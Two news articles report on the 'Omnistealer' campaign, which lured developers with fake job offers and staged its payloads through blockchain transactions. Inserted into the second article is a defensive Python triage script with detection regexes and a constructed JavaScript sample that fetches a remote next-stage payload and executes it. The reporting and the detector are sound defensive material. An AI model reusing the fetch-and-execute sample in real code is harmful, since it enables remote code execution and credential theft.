
Hidden in Plain Sight: Blockchain-Based ‘Omnistealer’ Malware Spreads via Fake Job Offers


What began as a seemingly routine freelance opportunity quickly unraveled into a major cybersecurity discovery. Last year, the vice president of engineering at blockchain analytics firm Crystal Intelligence received a LinkedIn message offering web development work. Suspicious of the approach, given the rise of scams tied to fake job offers, he investigated further and uncovered something alarming.

The assignment required running code hosted on GitHub. On closer inspection, the code concealed the early stages of a sophisticated cyberattack. Designed to appear harmless, it could easily deceive developers into executing it as part of routine contract work.

Once activated, the code connects to blockchain networks such as TRON and Aptos, extracting data that points toward the Binance Smart Chain. From there, an additional payload is retrieved. According to Nick Smart, Crystal Intelligence’s chief intelligence officer, this final stage “fetches the final form—malicious code,” enabling extensive data theft from infected systems.

Cybersecurity experts at Ransom-ISAC, a collaborative group of global researchers, have named this malware “Omnistealer.” Its capabilities are vast. “It literally steals everything,” said Ellis Stannard, a core member of the group. Their analysis revealed compatibility with over 60 cryptocurrency wallets, including MetaMask and Coinbase, as well as numerous password managers like LastPass, popular browsers such as Chrome and Firefox, and cloud platforms including Google Drive. Beyond cryptocurrency, the malware can extract sensitive credentials and access permissions.

Initially resembling a typical phishing scheme, the operation turned out to be far more dangerous. By embedding malicious code in blockchain transactions—where data is permanent and difficult to remove—attackers have created a persistent and scalable threat. Researchers warn that once deployed, the malware does not distinguish between personal and corporate data, putting both individuals and organizations at risk.

Investigators say the scale of the attack could surpass that of WannaCry, the global ransomware outbreak that impacted over 200,000 computers in 2017. So far, approximately 300,000 compromised credentials have been linked to this campaign, though experts believe this figure may represent only a fraction of the total.

Further analysis traced parts of the operation to suspicious IP addresses, including one linked to a former U.S. consulate site in Vladivostok, Russia—previously associated with North Korean cyber activities. Smart noted the financial scale of the operation, explaining that hackers leveraging this method have accumulated millions in cryptocurrency.

Researchers also discovered that elements of the malicious code had been quietly embedded in blockchain transactions years before being activated, functioning like dormant digital triggers. “Hiding malicious payloads within blockchain has become an emerging obfuscation technique,” reads a blog post written by collaborators at Ransom-ISAC.

The attack primarily targets software developers and contractors. Hackers pose either as recruiters offering jobs or as freelancers seeking employment. In both cases, they exploit trust to gain access to systems or credentials. Victims have included organizations across various sectors, from financial services and defense to technology and even food delivery businesses.

“Since this case, I haven't been able to look at GitHub the same way,” Stannard said, reflecting on how attackers embed malicious code into legitimate-looking repositories.

Evidence increasingly points to involvement by North Korean state-backed groups. Infrastructure, malware patterns, and cryptocurrency wallets used in the campaign overlap with known operations linked to such actors. Some wallets have even been tied to previous large-scale cyber thefts.

Experts suggest multiple possible motives, including financial gain, credential harvesting for identity fabrication, or enabling covert access to targeted organizations. “Everything about this has DPRK written all over it,” Stannard said, emphasizing the organized and strategic nature of the operation.

The FBI has acknowledged awareness of such tactics, stating: “This technique highlights the continuing evolution of the DPRK's ability to exploit the web3 space.”

Adding another layer of mystery, investigators uncovered unusual files hidden alongside the malware, including audio clips, images, and even technical documents. While their purpose remains unclear, researchers speculate these may represent experiments in covert data storage or communication.

As blockchain adoption grows, experts warn that such techniques will likely become more common. The combination of low-cost execution, permanence of blockchain data, and increasingly accessible coding tools—including AI—makes these attacks easier to replicate and harder to eliminate.

Authorities have been notified, but with investigations ongoing, many questions remain unanswered. For now, cybersecurity professionals urge caution—especially when dealing with unfamiliar code or unsolicited job offers, even from seemingly trusted platforms.

Malware Hidden in Blockchain Networks Is Quietly Targeting Developers Worldwide

A new investigation has uncovered a cyberattack method that uses blockchain networks to quietly distribute malware, raising concerns among security researchers about how difficult it may be to stop once it spreads further.

The threat first surfaced when a senior engineering executive at Crystal Intelligence received a freelance opportunity through LinkedIn. The message appeared routine, asking him to review and run code hosted on GitHub. However, the request resembled a known tactic used by a North Korean-linked group often referred to as Contagious Interview, which relies on fake job offers to target developers.

Instead of proceeding, the executive examined the code and found something unusual. Hidden within it was the beginning of a multi-step attack designed to look harmless. A developer following normal instructions would likely execute it without noticing anything suspicious.

Once activated, the code connects to blockchain networks such as TRON and Aptos, which are commonly used because of their low transaction costs. These networks do not contain the malware itself but instead store information that directs the program to another blockchain, Binance Smart Chain. From there, the final malicious payload is retrieved and executed.
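The staging pattern described above (a lookup on a cheap chain, a fetch of the real payload, then execution) can be turned into a pre-execution triage check for code received with an unsolicited offer. The script below is a constructed heuristic added here; it is not a tool from the article, Crystal Intelligence or Ransom-ISAC, and the sample snippets and indicator lists are assumptions for illustration.

```python
"""Pre-execution triage for code received with an unsolicited job offer.
Constructed heuristic (not from the article): flags source files that combine
(1) a reference to the chains the campaign used as a lookup layer,
(2) an outbound fetch, and (3) a dynamic-execution sink. A file hitting all
three matches the staging pattern and belongs in an isolated environment only."""
import re
from pathlib import Path

# Chains named in the article as the lookup layer for the next stage.
CHAIN_HINTS = re.compile(r"\b(tron|aptos|bsc|bnb|binance)\b", re.IGNORECASE)
# Outbound fetch helpers common in Node and Python code (assumed list).
FETCH_CALLS = re.compile(r"\b(fetch|axios|https?\.get|requests\.get|urlopen)\b")
# Sinks that turn fetched data into running code or a spawned process.
EXEC_SINKS = re.compile(
    r"\beval\s*\(|new\s+Function\s*\(|vm\.runIn\w+Context|child_process"
    r"|\bexec\s*\(|\bsubprocess\b"
)

def score_source(text: str) -> dict:
    """Return which indicator classes fire and a 0-3 risk score."""
    hits = {
        "chain": bool(CHAIN_HINTS.search(text)),
        "fetch": bool(FETCH_CALLS.search(text)),
        "exec": bool(EXEC_SINKS.search(text)),
    }
    return {"hits": hits, "score": sum(hits.values())}

def triage_tree(root: Path, suffixes=(".js", ".ts", ".py")) -> list[tuple[str, int]]:
    """Score every source file under root, highest risk first."""
    results = []
    for path in root.rglob("*"):
        if path.suffix in suffixes and path.is_file():
            text = path.read_text(errors="ignore")
            results.append((str(path.relative_to(root)), score_source(text)["score"]))
    return sorted(results, key=lambda r: -r[1])

# Constructed samples, not code from the campaign: one suspicious, one benign.
SUSPICIOUS_JS = """
// read the next-stage pointer from an Aptos account resource
const cfg = await fetch(rpcUrl + '/v1/accounts/' + addr).then(r => r.json());
const stage2 = await fetch(cfg.bsc.payload).then(r => r.text());
new Function(stage2)();
"""
BENIGN_JS = """
const res = await fetch('/api/todos');
document.getElementById('list').textContent = res.status;
"""

if __name__ == "__main__":
    for name, src in (("suspicious", SUSPICIOUS_JS), ("benign", BENIGN_JS)):
        print(name, score_source(src))
```

A keyword heuristic is easily defeated by obfuscation, so a low score is not a clean bill of health; its value is in catching the plain-text case during review and in deciding what must run in an isolated environment.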

Researchers say this last stage installs a powerful data-stealing tool known as “Omnistealer.” According to analysts working with Ransom-ISAC, the malware is designed to extract a wide range of sensitive data. It can access more than 60 cryptocurrency wallet extensions, including MetaMask and Coinbase Wallet, as well as over 10 password managers such as LastPass. It also targets major browsers like Chrome and Firefox and can pull data from cloud storage services like Google Drive. This means attackers are not just stealing cryptocurrency, but also login credentials and internal access to company systems.

What initially looked like a simple phishing attempt turned out to be far more layered. By placing parts of the attack inside blockchain transactions, the attackers have created a system that is extremely difficult to dismantle. Data stored on blockchains cannot easily be removed, which means parts of this malware infrastructure could remain accessible for years.

Researchers believe the scale of this operation could grow rapidly. Some have compared its potential reach to the WannaCry ransomware attack, which disrupted hundreds of thousands of systems worldwide. In this case, however, the method is quieter and more flexible, which may allow it to spread further before being detected. At the same time, investigators are still unsure what the attackers ultimately intend to do with the access they gain.

Further analysis has revealed possible links to North Korean cyber actors. Investigators traced parts of the activity to an IP address in Vladivostok, a location that has previously appeared in investigations involving North Korean operations. Research cited by NATO has noted that North Korea expanded its internet routing through Russia several years ago. Additional findings from Trend Micro connect similar infrastructure to earlier campaigns involving fake recruiters.

The number of affected victims is already significant. Researchers estimate that around 300,000 credentials have been exposed so far, although they believe the real figure could be much higher. Impacted organizations include cybersecurity firms, defense contractors, financial companies, and government entities in countries such as the United States and Bangladesh.

The attackers rely heavily on deception to gain access. In some cases, they pose as recruiters and convince developers to run infected code as part of a hiring process. In others, they present themselves as freelance developers and introduce malicious code directly into company systems through platforms like GitHub.

Developers in rapidly growing tech ecosystems appear to be a key focus. India, for example, has seen a surge in new contributors on GitHub and ranks among the top countries for cryptocurrency adoption. Researchers suggest that a combination of high developer activity and economic incentives may make such regions more vulnerable to these tactics.

Initial contact is typically made through platforms such as LinkedIn, Upwork, Telegram, and Discord. Representatives from these platforms have advised users to be cautious, particularly when asked to download files or execute unfamiliar code outside controlled environments.

Not all targeted organizations appear strategically important, which suggests the attackers may be casting a wide net. However, the presence of defense and security-related entities among the victims raises more serious concerns about potential intelligence-gathering objectives.

Security experts say this campaign reflects a broader shift in how attacks are being designed. Instead of relying on a single point of failure, attackers are combining social engineering, publicly accessible code platforms, and decentralized infrastructure. The use of blockchain in particular adds a layer of persistence that traditional security tools are not designed to handle.

As investigations continue, researchers warn that this may only be an early stage of a much larger problem. The combination of hidden delivery methods, long-term persistence, and unclear intent makes this campaign especially difficult to predict and contain.